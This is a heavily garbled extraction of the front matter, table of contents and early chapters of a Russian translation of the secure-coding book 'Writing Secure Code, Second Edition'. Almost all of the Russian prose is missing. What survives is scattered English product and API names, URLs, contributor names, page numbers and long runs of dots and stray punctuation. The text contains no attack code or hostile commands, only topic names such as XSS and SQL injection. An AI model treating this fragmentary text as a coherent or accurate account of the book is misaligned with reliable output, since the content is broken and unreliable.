Michael Howard, David LeBlanc
Writing Secure Code, Second Edition
2nd edition, 2005
UDC 004.45
BBK 32.973.26-018.2
X68
Translated from English. 2nd edition. 2005. 704 pp., illustrated.
ISBN 9785750202386
... C# ... Perl.
... Windows Security Push ... Microsoft.
24 ..., 5 ....
Active Directory, ActiveX, Authenticode, Hotmail, JScript, Microsoft, Microsoft Press, MSDN, MS-DOS, Visual Basic, Visual C++, Visual Studio, Win32, Windows, and Windows NT are trademarks of Microsoft Corporation.
© Microsoft Corporation, 2003
© Microsoft Corporation, 2003–2004
© 2005
Chapter 3 ... 43
SD³: ... 43
MAC ... 99
Part II ... 107
Chapter 5 ... 108
Unicode, ANSI ... 130
Unicode ... 132
/GS, Visual C++ .NET ... 143
Chapter 6 ... 147
ACL ... 147
ACL ... 150
ACL ... 153
ACE ... 155
ACL ... 155
ACL, Windows NT 4 ... 155
ACL, Windows 2000 ... 159
ACL, Active Template Library ... 162
ACE ... 164
SID ... 166
DACL, ACE ... 167
DACL ... 169
ACE ... 169
DACL ... 170
.NET Framework ... 171
COM+ ... 172
IP ... 173
SQL Server ... 174
Chapter 7 ... 177
SeBackupPrivilege ... 181
SeRestorePrivilege ... 184
SeDebugPrivilege ... 184
SeTcbPrivilege ... 185
SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege ... 185
SeLoadDriverPrivilege ... 185
SeRemoteShutdownPrivilege ... 186
SeTakeOwnershipPrivilege ... 186
SID, ACL ... 187
SID ... 188
ACL ... 188
LSA ... 189
ACL ... 190
LSA ... 191
2: API ... 192
5: SID ... 199
Windows XP / .NET Server 2003 ... 212
Windows .NET Server 2003 ... 214
Chapter 8 ... 222
rand ... 223
Win32 ... 225
Chapter 9 ... 257
PKCS #5 ... 261
Windows 2000 ... 262
Windows XP ... 265
Windows NT 4 ... 267
Windows 95/98/Me, Windows CE ... 270
PnP ... 271
FAT ... 290
XOR ... 290
3DES ... 290
3DES ... 290
3DES ... 291
3DES, ACL ... 291
3DES, ACL ... 291
Chapter 10 ... 293
Perl ... 300
Unicode ... 304
Perl ... 308
C++ ... 310
Chapter 11 ... 312
Napster ... 313
Mac OS X, Apache ... 314
DOS ... 314
/tmp, StarOffice (Sun) ... 314
Windows ... 315
AOL ... 321
eEye ... 321
Internet Explorer 4; IP ... 322
::$DATA, Internet Information Server 4.0 ... 323
8.3 ... 331
PATH ... 331
CreateFile ... 336
UTF-8 ... 336
ISAPI ... 337
Chapter 12 ... 342
2: SQL ... 348
Chapter 13: Web ... 355
<SCRIPT> ... 359
XSS ... 360
XSS ... 360
HTML ... 361
XSS ... 362
innerText ... 363
HttpOnly cookie, Internet Explorer 6 SP1 ... 364
<FRAME SECURITY>, Internet Explorer ... 367
ValidateRequest, ASP.NET 1.1 ... 367
HTML, Web ... 369
XSS ... 370
eval() ... 371
HTTP ... 371
ISAPI ... 372
cookie ... 375
SSL/TLS ... 375
Chapter 14 ... 377
I18N ... 378
Unicode ... 378
I18N ... 378
I18N ... 380
LCMapString ... 381
CreateFile ... 381
MultiByteToWideChar, MB_PRECOMPOSED, MB_ERR_INVALID_CHARS ... 382
WideCharToMultiByte, WC_NO_BEST_FIT_CHARS ... 382
Unicode ... 386
III
15
389
390
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 391
TCP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 398
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 398
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 399
, . . . . . 405
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 405
. . . . . . . . . . . . . . . . . . . 406
. . . . . . . . . . . . . . . . . . . . . . 406
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 407
IP . . . . . . . . . . . . . . . 407
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 407
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 408
IPv6 ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 409
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 410
16
411
RPC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 412
RPC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 412
RPC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 413
RPC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 414
RPC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 416
/robust MIDL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 416
[range] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 416
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 417
. . . . . . . . . . . . . . . . . . 422
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 422
. . . . . . . . . . . . . . . . 425
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 426
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 427
. . . . . . . . . . . . . . . . . . . . . . . . . . . 428
RPC . . . . . . . . . . . . . . 429
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 431
DCOM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 432
DCOM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 432
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 434
DCOM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 434
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 437
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 440
ActiveX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 440
ActiveX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 441
ActiveX,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 441
SFI SFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . 443
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 446
17
447
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 447
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 451
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 459
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 459
, . . . . . . . . . . . . . . . . . . . . . . . . . 461
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 462
18
.NET
463
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 465
: FxCop . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 466
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 467
ASP.NET . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 469
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 469
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 470
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 470
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 471
Assert . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 472
Demand Assert . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 473
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 475
Demand LinkDemand . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 476
LinkDemand . . . . . . . . . . . . . . . . . . . . . 477
SuppressUnmanagedCodeSecurityAttribute: . . . . . . 478
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 479
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 479
XML . . . . . . . 481
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 481
,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 482
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 483
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 483
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 484
ASP.NET . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 485
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 486
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 487
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 487
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 488
IV
19
491
492
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 492
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 493
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 494
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 495
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 495
. . . . . . . . . . . . . . . . . . . . . . . . . . . . 496
, . . . . . . . . 497
STRIDE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 497
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 499
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 501
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 510
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 511
. . . . . . . . . . . . . . . . . . . . . . . . . 527
/ . . . . . . . . . . . . . . . . . . . . . . . . . . . 528
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 529
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 530
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 531
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 531
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 532
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 532
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 532
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 532
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 534
20
535
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 537
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 538
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 538
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 540
: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 543
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 543
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 544
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 544
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 545
21
546
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 547
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 549
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 549
API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 556
Windows Installer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 557
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 558
22
559
. . . . . . . . . . . . . . . . . . . 560
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 560
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 561
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 561
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 561
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 563
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 564
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 564
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 565
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 566
, . . . . . . . . . . . . . . 566
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 566
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 569
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 578
23
579
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 579
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 580
, . . . . . . . . . . . . . . . . . . . . . . . . . . 580
. . . . . . . . . . . . . . . . . . . . . . . . . . . 581
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 583
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 584
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 584
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 584
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 584
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 585
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 586
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 586
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 586
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 586
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 587
IRP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 589
. . . . . . . . . . . . . . . . . . . . . . . 590
. . . . . . . . . . . . . . . . . . . . . . . . . . . 590
, . . . . 590
CreateProcess . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 591
NULL lpApplicationName . . . . . . . . . . . . . . . . . . 592
lpCommandLine . . . . . . . . 592
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 593
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 593
\Program Files . . . . . . . . 594
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 594
CreateFile . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 596
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 597
EFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 600
. . . . . . . . . . . . . . . . . . . . . . . . . . . 601
, , . . . . . . . . . . . . . . . 601
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 602
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 602
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 603
SID . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 603
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 604
_alloca . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 604
ATL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 605
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 606
DLL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 606
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 607
C/C++ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 608
24
609
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 609
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 610
. . . . . . . . . . . . . . . . . . . . . . . 611
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 611
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 613
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 614
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 614
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 616
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 618
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 618
, , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 620
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 621
. . . . . . . . . . . . . . . . . . . . 621
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 622
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 623
API-
625
626
API, . . . . . . . . . . . . . . . . . . . . . . . . . . . 627
API, . . . . . . . . . . . . 629
API, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 630
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 631
API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 631
API, DoS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 632
API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 633
API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 634
636
643
645
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 645
Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 647
RPC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 647
ActiveX, COM DCOM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 648
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 648
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 648
650
652
653
658
671
2002 . Microsoft
Windows .
, Windows .NET Server 2003.
Windows Security Push ( )
,
,
.
Windows, ,
, Windows
Security Push, Microsoft,
SQL Server, Office, Exchange, Systems Management Server, Visual Studio .NET,
.NET (CLR) .
Windows Security Push (
) , 15 2002 .
,
, ,
.
Microsoft,
, :
, .
.
,
, ,
.
, . ,
.
.
.
, .
, :
, ,
, ,
.
:
, , .
, ,
.
Web, ,
.
, , ,
.
.
!
, .
, .
. ,
, .
: .
,
,
.
, ,
. ,
,
, , .
, , ,
, ,
, . ,
Microsoft Windows .NET Server 2003 ,
, ,
. .
, ,
. , Web Win32
Microsoft .NET Framework.
, ,
.
, Microsoft,
. ,
Microsoft,
, .
, , Windows
. , ACL,
Everyone, World Writable UNIX
,
.
. 1 (
14) , ,
,
.
2 3. 2
( 514) ,
(
) . 3
( 15 18),
.NET.
4 ( 19 24).
, : ,
, .
23 ,
, .
5 API,
, ,
,
.
,
,
.
. , ,
.
Web Microsoft
Press, (http://www.microsoft.com/mspress/books/5957.asp).
, Companion Content
. Web Companion Content
Microsoft Press
Support. ,
. .
My Documents\Microsoft Press\Secureco2.
.
C C++; Microsoft Visual
Studio .NET,
, Microsoft Visual C++ 6.0. Perl
ActiveState Perl 5.6 ActiveState Visual Perl 1.0 (http://www.activestate.com).
, ,
. Microsoft Press
http://mspress.microsoft.com/support/.
,
Microsoft Press http://www.microsoft.com/mspress/support/search.asp.
,
.
, , .
Microsoft Press,
(Danielle Bird) ,
, (Devon Musgrave)
,
(Brian Johnson) ,
. (Kerri DeVault)
(Rob Nance) .
. Microsoft:
(Saji Abraham), (Ümit Akkus), (Doug Bayer),
(Tina Bird), (Mike Blaszczak), (Grant Bolitho),
(Christopher Brumme), (Neill Clift),
(David Cross), (Scott Culp), (Mike Danseglio),
(Bhavesh Doshi), (Ramsey Dow), (Werner Dreyer),
(Kedar Dubhashi), (Patrick Dussud), (Vadim
Eydelman), (Scott Field), (Cyrus Gray),
(Brian Grunkemeyer), (Caglar Gunyakti), (Ron Jacobs),
(Jesper Johansson), (Willis Johnson),
(Loren Kohnfelder), (Sergey Kuzin), (Mike Lai),
(Bruce Leban), Yung (Yung-Shin Lin) Bala ,
, Microsoft, ,
. (Peter Gutmann),
(Steve Hayr) Accenture, (Christopher W. Klaus) Internet Security Systems, (John Pescatore)
Gartner Inc., (Herbert H. Thompson)
(James A. Whittaker) Florida Tech , , (Chris Wysopal)
Weld Pond @Stake.
: Microsoft
,
. !
,
,
,
,
.
,
,
, ,
.
: Microsoft.com
, ,
.
, ,
, :
, ,
. ,
. ,
90. , 850
(Steve McConnell) (Microsoft Press, 1993)
.
, ,
.
.
.
, , ,
AutoPC ,
. , ,
,
. , ,
( )
, ,
. , ,
. , World Wide Web
Wild Wild Web* ? , .
, , .
, 13 2001 , Web
,
(System Administration, Networking and Security Institute, SANS) http://www.sans.org. SANS
SANS NewsBytes
:
,
.
,
, , .
.
, .
(defacement) Web
http://www.msnbc.com/news/600122.asp.
! ,
, .
, ,
. :
, , ,
.
,
. ,
, , ,
.
, ,
.
, ,
, .
, , ,
, .
, .
Web-
, ,
. ,
, . (honey
pot* ), .
,
,
Honeynet (project.honeynet.org).
, 90
Web http://www.windows2000test.com,
Windows 2000 .
. Web ,
. ,
.
, , . ,
, .
. ,
. , ,
(whitehats), ,
; .
, Microsoft.
, .
:
.
, , ,
.
,
(script kiddies).
, (scripts),
. . .
, ,
, ( exploit code,
exploit, sploit).
.
,
,
.
,
. ,
, .
, .
, , (trustworthy computing),
,
Microsoft , , . , ,
: , .
,
.
, . ,
, .
. ,
. (
.) ,
.
, , ,
, .
, ,
. ,
, (selfhealing).
.
,
.
!
, ,
, ,
.
, .
,
. , ,
. ? ,
. ,
.
, (
) . ,
,
. , ?
,
, . ,
.
, , ,
.
. ,
.
!
, .
, , ,
. ( ,
,
; .) ,
. , ,
,
.
, ,
: .
. ,
, ,
. , , ,
. , ,
, .
. 11, .
,
. ,
Microsoft Age of Empires 2, ,
,
. , ,
.
, ,
.
. 11.
( )
, ,
. , ,
.
, ?
, ,
,
, . ,
,
.
.
, ,
,
, .
,
.
.
, ,
. ,
, .
, ,
, . ,
, ,
. ,
!
,
.
,
:
;
, ;
, ;
, ;
;
;
,
, Authenticode;
Web;
,
;
PR,
;
(ISP);
,
, ,
;
.
,
. ,
, , ,
;
, , ,
.
,
, .
!
,
Microsoft (Microsoft Security Response Center) ,
, ,
100 000 .
,
(Computer Crime and
Intellectual Property Section, CCIPS) Web (http://www.cybercrime.gov).
, , ,
.
, ,
.
.
,
. .
,
. .
,
. , , ,
, .
, :
;
;
(script) ,
;
(
, ?);
,
;
,
,
.
(regression bug)?
; , .
, .
, ,
, . ,
.
. ,
.
Perl, .
: ,
, . ,
, . .
TCP (Transmission Control
Protocol), Perl:
, ,
. ,
, .
5.
,
,
. :
(own),
?
(own)?
. , 0wn3d (owned
). , !
. , 3
e (,
E), 0 O . ,
, (rooted)
(root).
(superuser), Unix root.
Administrator () SYSTEM Microsoft Windows NT/2000/XP .
, .
; , , .
, ,
, , , ,
. ,
.
! ,
. .
,
, .
, ,
, . , ,
,
.
,
, ,
. ,
.
,
.
, ,
. , ,
(Jim Allchin), Windows Microsoft.
, Windows:
, , Windows XP
. ,
,
. , Microsoft
.
,
.
Windows XP
.
